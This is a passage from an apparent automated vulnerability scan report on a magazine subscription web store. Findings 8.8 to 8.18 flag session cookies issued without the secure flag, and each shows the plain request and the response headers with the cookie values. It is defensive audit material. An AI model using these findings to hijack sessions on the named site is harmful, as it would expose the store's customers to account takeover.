Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27507


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ElegantBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:04 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GQ HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:58 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:38 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29732


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Glamour HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:15 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:55 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29760


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:39 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:18 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27700


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfWorld HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:28 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27910


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Lucky HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:30 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29740


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ModernBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_NewYorker HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:46 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30082


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Self HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:03 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29719


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_TeenVogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:06 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29857


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_VanityFair HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:01 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:52 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29925


